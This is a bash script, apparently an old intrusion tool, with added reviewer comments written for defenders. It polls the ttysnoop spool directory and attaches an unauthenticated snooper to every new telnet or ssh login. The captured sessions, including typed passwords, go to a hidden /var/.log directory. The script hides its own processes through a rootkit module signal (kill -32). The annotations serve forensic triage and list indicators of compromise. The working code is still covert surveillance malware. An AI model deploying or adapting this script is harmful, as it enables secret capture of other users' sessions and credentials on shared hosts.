#!/bin/bash
####
# A simple shell script to work in conjunction with ttysnoop.
# This assumes you have a ttysnoop that does not require authentication,
# which is a quick hack to the source (grep for authenticate).
# In a kludgy sort of way, it watches for a new connection (either via
# telnetd or sshd) which will place a new ttypX socket in the ttysnoop spool
# directory. If a new one is noticed, a ttysnoop process is attached to
# it and logged accordingly.
#
# If you have ideas for changes to this, I'd like to hear of them.
#
# warchild@spoofed.org
####
# NOTE(review): this is a terminal-session capture loop paired with a
# process-hiding kernel module. Everything below is documented from the
# defender's side: what the script does as written and which artifacts it
# leaves on a host (paths, signals, child processes, polling behaviour).
####
###
# BUGS: but of course!
###
# -32 is implemented by the synapsys LKM.
# This process and all it's little children will be hidden.
# YMMV.
#
# Sends signal 32 to the script's own PID ($$). The comment above says the
# "synapsys" module intercepts this as a hide-me request. On a host where no
# such module is loaded, signal 32 keeps its default disposition (a real-time
# signal, default action terminate on Linux), so the script would most likely
# die right here -- a useful sanity check when triaging a suspected copy.
# Detection angle: a shell sending a real-time signal to itself immediately
# after start, and a running bash that is not visible in normal process
# listings, are both anomalies worth an alert.
kill -32 $$
# change these to fit your setup.
# consider hiding these using a LKM of sorts
#
# TTYSNOOP  - snooper binary attached to each new tty entry.
# SPOOL_DIR - directory polled for new tty entries (one per fresh login).
# LOG_DIR   - where captured sessions are written. Note the dot-prefixed
#             directory under /var; a hidden directory at this location is
#             itself an indicator of compromise and is the first place to
#             look for captured sessions.
TTYSNOOP=/sbin/ttysnoop
SPOOL_DIR=/var/spool/ttysnoop
LOG_DIR=/var/.log/ttysnoop
# Infinite poll loop: list the spool every 2 seconds and attach a snooper to
# any entry that does not already have a log file. `while(true)` forks a
# subshell just to run `true` each iteration -- one extra fork every 2 s.
while(true); do
  # Unquoted `ls` output is word-split into tty names; fragile (SC2045) but
  # adequate for the short, space-free names the spool is expected to hold.
  for tty in `ls $SPOOL_DIR`; do
    # name the logs in a identifying sorta way
    #
    # Log name = <tty>-<fields 6,7,8 of `ls -l`> (the mtime columns of the
    # spool entry, presumably month-day-time; layout is locale dependent).
    # Consequence for forensics: log filenames encode when each tty entry
    # appeared, i.e. approximate login time per captured session.
    LOG_NAME=$tty-`ls -l $SPOOL_DIR/$tty | awk '{print $6"-"$7"-"$8}'`
    LOG=$LOG_DIR/$LOG_NAME
    # the logs should remain fairly unique.
    #
    # Only attach when no log of that name exists yet; an existing log
    # suppresses re-attachment to the same tty/timestamp pair.
    if [ ! -f $LOG ]; then
      # Detached, backgrounded snooper child: stdout/stderr go to the log.
      # Each one is a long-lived `ttysnoop` process that survives the loop's
      # own death (nohup), so process-tree and open-file inventories
      # (anything holding a file under LOG_DIR open for write) are the
      # practical way to enumerate active captures.
      nohup $TTYSNOOP $tty > $LOG 2>&1 &
    fi
  done
  # Poll interval; also bounds how long a new login goes unobserved.
  sleep 2
done